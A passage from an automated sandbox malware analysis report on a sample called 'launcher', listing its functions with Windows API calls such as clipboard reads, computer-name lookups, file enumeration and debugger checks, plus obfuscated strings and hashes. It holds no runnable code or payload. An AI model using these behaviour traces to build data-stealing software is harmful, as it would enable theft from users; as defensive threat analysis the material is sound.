Instruction Fuzzy Hash: 0C41B6B4C10B40AFD370EF399A4B7137EB8AB05250F504B1DF9EA866D4E631A4198BD7

Function 0042B124 Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042B155
GetComputerNameExA.KERNEL32(00000006,2ED529C9,00000100), ref: 0042B20D

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 2f3873dcc8189ae53a33e27fa4388a8ac659bc40d5b7f9760f5184f65b251fff
Instruction ID: ae69e518813156af8f5511fc2aaf399dc8ca19c5fd872d60aa8c48f5f0e2b783
Opcode Fuzzy Hash: 2f3873dcc8189ae53a33e27fa4388a8ac659bc40d5b7f9760f5184f65b251fff
Instruction Fuzzy Hash: AC21B53460C3C28BE7258F35DD547FABBB1AB97341F54856ED0C89B242CB38851ACB16

Function 0042B122 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042B155
GetComputerNameExA.KERNEL32(00000006,2ED529C9,00000100), ref: 0042B20D

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 6ea1831314b6702bd95289ac64749151140ca1fb2f22137441b3ecba3fb113ac
Instruction ID: 3df516dae04b592a7a861b26cd981be9c2432deca943cd0bc48f1ed45f16df81
Opcode Fuzzy Hash: 6ea1831314b6702bd95289ac64749151140ca1fb2f22137441b3ecba3fb113ac
Instruction Fuzzy Hash: 8B21053061C3828BE7258F31DD547EABBB1EBC6341F44897ED0888B245CB38850ACB16

Function 0043C079 Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C079
GetForegroundWindow.USER32 ref: 0043C07F

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 8d36c4753d82363ea8877dda61a6721fbf1d2e0f4bb6bc33ce512656825ccc6b
Instruction ID: 493948553ec9f8103dd06b0e74e60ad077e7a5c60a82ad2f2755ac0d5a951771
Opcode Fuzzy Hash: 8d36c4753d82363ea8877dda61a6721fbf1d2e0f4bb6bc33ce512656825ccc6b
Instruction Fuzzy Hash: 46C04C7D5511008BC244BF64ED594143BA0F7072457050474EA53C22B0CB30A41C8E49

Function 0042B0AB Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000006,2ED529C9,00000100), ref: 0042B20D

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: df17672237c789a29b5ae0f6b3324ab57e32c9373fc5fcaf09357d821947e0f5
Instruction ID: 61e663dcc69b04b23348e60fbbad4b2195c09486ffcb0ac58589e434c840318e
Opcode Fuzzy Hash: df17672237c789a29b5ae0f6b3324ab57e32c9373fc5fcaf09357d821947e0f5
Instruction Fuzzy Hash: 3821D57461C3818BE725CF31DD947EABBB1ABCA341F54897DD0889B245CB38850A8B16

Function 0043B400 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B165,?,?), ref: 0043B432

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4da1d79e81b88741fd7dd83bf03fef74277aaf070c8062bfafb243c7ed25e0e
Instruction ID: 86bdb174762350301c311c977c7864123943641c83e81089c461a880b73b4392
Opcode Fuzzy Hash: a4da1d79e81b88741fd7dd83bf03fef74277aaf070c8062bfafb243c7ed25e0e
Instruction Fuzzy Hash: F2E02B36404251BBC2002F287C06B1B3764DFCB724F02583AF50162116D739EC02C9DF

Function 0042D68D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042D6D6

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1c932f03a97383520c051e2eb3de128c0968d7e58e1b78984da86cffafc96bf4
Instruction ID: 4f8ba42394077c65085e15bf99e63f23274fa961aed152a365bb46c17acdb149
Opcode Fuzzy Hash: 1c932f03a97383520c051e2eb3de128c0968d7e58e1b78984da86cffafc96bf4
Instruction Fuzzy Hash: EF01F9B46057018FD304EF28C59871ABBF1FBC5304F10885CE5958B3A0CB79A958CF82

Function 004308D7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00430922

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 6933df42b7a313fb45d0988960ba2694302f99befd6d8417df05efe1ba3c55d2
Instruction ID: 4396c8ea6c34dd60a3af316b5cb32c499b15fc80ec4c4918aad3c376bebb887a
Opcode Fuzzy Hash: 6933df42b7a313fb45d0988960ba2694302f99befd6d8417df05efe1ba3c55d2
Instruction Fuzzy Hash: 35F0A4755097028FE710DF25D55834BBBF1BB84318F158A1CE4A94B294C7B9A5498F82

Function 0040E6CF Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E6E1

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: efbc46f8ac356fb8ded64c3d0b46ebe48af52753a34a5baa7889cf4c1b21790e
Instruction ID: 7fdfe02baa2337c056e183750b88626d8b954d00633b9c75a4ac19f75037de24
Opcode Fuzzy Hash: efbc46f8ac356fb8ded64c3d0b46ebe48af52753a34a5baa7889cf4c1b21790e
Instruction Fuzzy Hash: CBD0C9347C43517AF1784B58ED97F1432505746F11FB00624B362FE2D0C9E0B2118A0D

Function 00439AA0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0041289F), ref: 00439AC0

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0877a128baea57864a17a530101fc6ed9629df4607b43df79c26b4c46166da29
Instruction ID: d964c9141d5866b1ffc44d1b1b0bd943ecfc8a2c276b6f9c5ab337128886fa0c
Opcode Fuzzy Hash: 0877a128baea57864a17a530101fc6ed9629df4607b43df79c26b4c46166da29
Instruction Fuzzy Hash: 8ED0C935445122EBCA102F28BC05BCB7BA49F4A320F0748A1B540AA076D734AC918AD8

Non-executed Functions

Function 004175BE Relevance: 13.4, APIs: 3, Strings: 4, Instructions: 1197COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,64746910,6474690E,00000000,00000000,?,00000000), ref: 00417EF1

Strings

{A, xrefs: 00417BD6
UNOL, xrefs: 00418269
[7`1, xrefs: 00417C90
, xrefs: 00417FFF

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $UNOL$[7`1${A
API String ID: 237503144-751461804
Opcode ID: 2b56c22efeadc7fdcab38f9c4bf32ad4b619dd4b91edf89e10c48c26a71829f7
Instruction ID: 5faaac5d03cfac0577dee8d8baec84f428eb9aa293f5a4fea6829524d43d6138
Opcode Fuzzy Hash: 2b56c22efeadc7fdcab38f9c4bf32ad4b619dd4b91edf89e10c48c26a71829f7
Instruction Fuzzy Hash: AA7236766083118BD728CF28C8917ABB7F2FF99314F18896DE4C687391E7389945CB46

Function 00411056 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 468COMMON

Download Yara Rule

Strings

C, xrefs: 004115B2
\, xrefs: 00411264
r, xrefs: 00411411
y, xrefs: 004110C3
k, xrefs: 004113B1

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: C$\$k$r$y
API String ID: 0-1251240214
Opcode ID: 6eb03c5d0aa17056d3509db8c708357f33ace97c365b8e549167cc2a16901b35
Instruction ID: e42ba5de3bb0b6b0495ea35c84989f7ba5d6b1594d427b622ec4058845654ec4
Opcode Fuzzy Hash: 6eb03c5d0aa17056d3509db8c708357f33ace97c365b8e549167cc2a16901b35
Instruction Fuzzy Hash: CA128C7560C7808BC724DF38C5913AFBBE1ABD9314F14892EE5D987392DA3895868B07

Function 00422B80 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00422CB5

Strings

Y^, xrefs: 00422BF2
AU, xrefs: 00422BFA
SH, xrefs: 00422BEA

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: AU$SH$Y^
API String ID: 237503144-2404045158
Opcode ID: e88382e8798602c79b54a05df13ad70b4c7f40ed0ae9868697fc80504591eb5f
Instruction ID: b9b455c7828172f46886e6bc35af512bdd192be1a682c06dc4598f973b7f6f92
Opcode Fuzzy Hash: e88382e8798602c79b54a05df13ad70b4c7f40ed0ae9868697fc80504591eb5f
Instruction Fuzzy Hash: 188176B66083509FD310CF65EC4175FBBE5EBC5314F09893DE8909B381DBB8980A8B92

Function 004259F0 Relevance: 10.2, Strings: 8, Instructions: 197COMMON

Download Yara Rule

Strings

VT, xrefs: 00426255
VO, xrefs: 0042624A
+r>p, xrefs: 0042614A
2v6t, xrefs: 0042613F
RcB, xrefs: 0042634C
'j7h, xrefs: 00426134
WY, xrefs: 00426260
>n<l, xrefs: 00426129

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: 'j7h$+r>p$2v6t$>n<l$RcB$VO$VT$WY
API String ID: 0-1043105243
Opcode ID: eee088556cdcdba35b35ef8373f273d2f8fc22b9121129a064ce1fe21cd9e5d9
Instruction ID: 494783481e6aa68ec648dd4e41b79cad06601994307a4e73c7919a71566d585a
Opcode Fuzzy Hash: eee088556cdcdba35b35ef8373f273d2f8fc22b9121129a064ce1fe21cd9e5d9
Instruction Fuzzy Hash: C3619FB46083908BD7309F65E812B9BBBF0FF82314F40192DD5C99B252D7788911CB5B

Function 00431740 Relevance: 9.1, APIs: 6, Instructions: 139clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431764
GetClipboardData.USER32 ref: 0043177F
GlobalLock.KERNEL32 ref: 0043179C
GlobalUnlock.KERNEL32 ref: 004318E8
CloseClipboard.USER32 ref: 004318F0

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: aa675a0d958be9e4c95dc81545fc9698ecb9b327ab0615df1477f6ab8e6f813a
Instruction ID: 396d5abce357fe67380c5883450713eb2d221a40a731ebaded2830b19a981595
Opcode Fuzzy Hash: aa675a0d958be9e4c95dc81545fc9698ecb9b327ab0615df1477f6ab8e6f813a
Instruction Fuzzy Hash: 7E51E4B1D08B928FD700BBB8984936EBFA0AF06314F04863DD5D587695D37CA468C797

Function 00B51A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00B513BD,00000002,00000000,?,?,?,00B513BD,?,00000000), ref: 00B51AA0
GetLocaleInfoW.KERNEL32(?,20001004,00B513BD,00000002,00000000,?,?,?,00B513BD,?,00000000), ref: 00B51AC9
GetACP.KERNEL32(?,?,00B513BD,?,00000000), ref: 00B51ADE

Strings

OCP, xrefs: 00B51A5B
ACP, xrefs: 00B51A25

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 352f58e4e389ecb572784936529ad9285c671a974b412442fdf3d36024a67cdf
Instruction ID: 5e54b3adad96517b9f4f3e6488407dc38713b4df91bd3b10aa2476480e81931b
Opcode Fuzzy Hash: 352f58e4e389ecb572784936529ad9285c671a974b412442fdf3d36024a67cdf
Instruction Fuzzy Hash: FE21B822B02500A6EB36CF6CC940B9773E6EB54B56B568DE4ED29D7100F731DD48C750

Function 00425DD7 Relevance: 7.9, Strings: 6, Instructions: 430COMMON

Download Yara Rule

Strings

v$%6, xrefs: 00425DF2
==Vg, xrefs: 00426046
>:<*, xrefs: 00426036
pW5C, xrefs: 00425E0A
2OH:, xrefs: 00425DFA
6??5, xrefs: 00425E02

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: 2OH:$6??5$==Vg$>:<*$pW5C$v$%6
API String ID: 0-1921259365
Opcode ID: b4b998482fbf4dc054c54b980299613e9c3dc4969a21282279849b69e4ba72bf
Instruction ID: fc4831f9e15cc2fffd13c474088fbe340db424d9982761313925ba8f67a5e46c
Opcode Fuzzy Hash: b4b998482fbf4dc054c54b980299613e9c3dc4969a21282279849b69e4ba72bf
Instruction Fuzzy Hash: F0D158B5A0C791DBC7049F74E89126BBBE4AF86304F58487EF4C28B351E739D9018B5A

Function 00409210 Relevance: 7.9, Strings: 6, Instructions: 357COMMON

Download Yara Rule

Strings

~~|x, xrefs: 0040958E
w, xrefs: 004094E2
B~{q, xrefs: 00409241
`ian, xrefs: 00409259
OvRY, xrefs: 00409249
jN@|, xrefs: 00409231

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: B~{q$OvRY$`ian$jN@|$w$~~|x
API String ID: 0-325120139
Opcode ID: a22bad063c165d0bd93474fcd8c7372986f21cf75cb7bb9ce54dbef89405fceb
Instruction ID: 561425758e1aa044d8b45617accda6fadd7d73709e23bc7229232b990db513cd
Opcode Fuzzy Hash: a22bad063c165d0bd93474fcd8c7372986f21cf75cb7bb9ce54dbef89405fceb
Instruction Fuzzy Hash: 7CA1E17164C3818AC3168F6A84A076BFFE1AFD7340F08496DE4C55B3C2D279890AC796

Function 00B31FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B31240: _strlen.LIBCMT ref: 00B312BA

GetFileSize.KERNEL32(00000000,00000000), ref: 00B32046
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B3206B
CloseHandle.KERNEL32(00000000), ref: 00B3207A
_strlen.LIBCMT ref: 00B320CD
CloseHandle.KERNEL32(00000000), ref: 00B321FD

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: CloseFileHandle_strlen$ReadSize
String ID:
API String ID: 1490117831-0
Opcode ID: 29df1958edaf24c4814ff148bfccd7070aeb3076bde3783df098ced0cbede6c8
Instruction ID: 3fd36aa5429804210e14b90eb44105e59fdd740d07b53ba4f914cbc641590961
Opcode Fuzzy Hash: 29df1958edaf24c4814ff148bfccd7070aeb3076bde3783df098ced0cbede6c8
Instruction Fuzzy Hash: 2F71D2B2C006149BCB10DFA8DC85BAEBBF5FF48310F240669E815B7391E7759945CBA1

Function 00B51287 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(00000000,?,00B4E58D), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00B48363), ref: 00B4C210

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00B5138F
IsValidCodePage.KERNEL32(00000000), ref: 00B513CD
IsValidLocale.KERNEL32(?,00000001), ref: 00B513E0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B51428
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B51443

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 6b50c618ef04fe821377b7acb3ba0a381158ad8b57bf6d62a40660451d059c42
Instruction ID: 51678eee6a2a65823d93c422275e2951c78a2f25173158a9ab171227fa4d9bb6
Opcode Fuzzy Hash: 6b50c618ef04fe821377b7acb3ba0a381158ad8b57bf6d62a40660451d059c42
Instruction Fuzzy Hash: BD514071A01205ABDB10EFA9CC85BBE77F8EF05702F1448E5ED11E7190EBB09A49CB60

Function 00B49CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction ID: 7f3aa85cce84495707ade0f7895ee15ccdfc14cc5c853e48274a91cae678079b
Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction Fuzzy Hash: 34022A71E012199BDF14CFA9C8806AEBBF1FF48314F2482A9E519E7380D731AE45DB91

Function 00423011 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

n\]^, xrefs: 004246CE, 004246DF
CONM, xrefs: 00424652
FB, xrefs: 004246E5
ZG@R, xrefs: 00424637
^WWM, xrefs: 0042463F

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID: CONM$ZG@R$^WWM$n\]^$FB
API String ID: 0-1048393297
Opcode ID: d10de4c44fa466483634686c42f96fcdbbf0e77942242f48ad5c3fc12d2a33bf
Instruction ID: 588f3a15595a0843e0fd63c366a28e3246654cd9379900f72a648d5f311c5c3a
Opcode Fuzzy Hash: d10de4c44fa466483634686c42f96fcdbbf0e77942242f48ad5c3fc12d2a33bf
Instruction Fuzzy Hash: 13513571B083658BD730DA64A8813EBB7E1DF92300F94492FCAD587381E63CD946D79A

Function 00B51FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B520D9

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c92b6d0c57ed98fbb6a215ab466b12377c769365642688d7a2722149592aede6
Instruction ID: 012134d2f2a79e83dbda4ae95039f8270737a0607de7ce001e1d2444256cdbda
Opcode Fuzzy Hash: c92b6d0c57ed98fbb6a215ab466b12377c769365642688d7a2722149592aede6
Instruction Fuzzy Hash: D07103719061199FDF21AF38DC89BFAB7F9EB06301F1841D9E948A3251DB318E889F10

Function 00B3F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B3F8F5
IsDebuggerPresent.KERNEL32 ref: 00B3F9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3F9DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00B3F9E4

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3b784e496684c8ec3bd704d5255015c8289632867b80adfd4c87131c123ecd5b
Instruction ID: 6cf823f89a26f0638e46ac0b11ff3bb3c609440a4e6cc9db6c053ec7eddfb8ba
Opcode Fuzzy Hash: 3b784e496684c8ec3bd704d5255015c8289632867b80adfd4c87131c123ecd5b
Instruction Fuzzy Hash: CB31F675D01219EBDB21DFA4D9497CDBBF8AF08300F1041EAE40CAB290EB759A848F45

Function 004284DF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 004285BC
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 004286FF

Strings

XY^, xrefs: 004286A7

